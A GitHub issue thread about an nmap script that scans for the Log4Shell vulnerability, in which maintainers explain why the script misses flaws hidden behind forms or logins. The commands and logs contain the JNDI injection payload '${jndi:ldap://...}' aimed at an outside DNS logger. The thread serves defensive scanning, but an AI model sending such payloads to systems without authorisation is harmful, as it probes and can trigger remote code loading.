### ISSUE TITLE
doesn't work for me

### ISSUE THREAD

**Issue by doubledrat** [Diverto/nse-log4shell#8]
thanks for sharing this.  However I have a known-vulnerable system that is not showing as vulnerable with this method.

I'm using nmap v7.91 on windows

my command line is 

`nmap -v --script=http-log4shell "--script-args=log4shell.payload=\"${jndi:ldap://{{target}}.my.dnslogger}\"" -T4 -n -p80,443,8080 --script-timeout=1 my.vulnerable.machine`

nothing shows up in my dnslogger.  I know the logger is working because I get an entry when I issue 

`nslookup google.com my.dnslogger`

from the vulnerable machine

any ideas?

**Comment by doubledrat** [comment]
log output -



> Initiating NSE at 13:50
> NSE: Starting http-log4shell against my.vulnerable.machine (999.99.999.99:80).
> NSE: [http-log4shell 999.99.999.99:80] Final payload:${jndi:ldap://999.99.999.99-80.my.dnslogger}
> NSE: Starting http-log4shell against my.vulnerable.machine (999.99.999.99:443).
> NSE: [http-log4shell 999.99.999.99:443] Final payload:${jndi:ldap://999.99.999.99-443.my.dnslogger}
> NSE: [http-log4shell 999.99.999.99:443] Path does not require authentication
> NSE: Finished http-log4shell against my.vulnerable.machine (999.99.999.99:443).
> NSE: [http-log4shell 999.99.999.99:80] Path does not require authentication
> NSE: Finished http-log4shell against my.vulnerable.machine (999.99.999.99:80).

**Comment by kost** [comment]
Where vulnerability is located? if it is hidden behind application form deep inside application or behind authorization, these scripts will not find it.It will issue HTTP requests to the webserver root and that's it. In short it will not crawl every URI on the webserver.

**Comment by doubledrat** [comment]
I'm confused.  I was hoping this script would tell me all my vulnerable systems.  If I have to find out where a system is vulnerable before I run this script, under what circumstances does the script help?

**Comment by kost** [comment]
Script helps in identifying vulnerable services, not vulnerable application. It can identify vulnerable application if it logs every request (including root /), not if vulnerability is hidden behind some URL or login. You will need web scanner which crawls complete web for that. 

With this NSE scripts, you can specify specific URL: 
```http-log4shell.url=/application```

It will check via HTTP headers and cookie.

But it will not crawl further nor test web forms. You need web scanners for that. Hoe you have better understanding now.

**Comment by kost-div** [comment]
BTW just released crawler/spider for http, but it have basic functionalities (it will only submit if it finds get or post parameters): 

```nmap -v --script=http-log4shell,http-spider-log4shell "--script-args=log4shell.payload=\"${jndi:ldap://{{target}}.my.dnslogger}\"" -T4 -n -p80,443,8080 --script-timeout=1 my.vulnerable.machine```

Best assurance is to have local/filesystem scan. Remote scans like this ones are only for additional assurance.
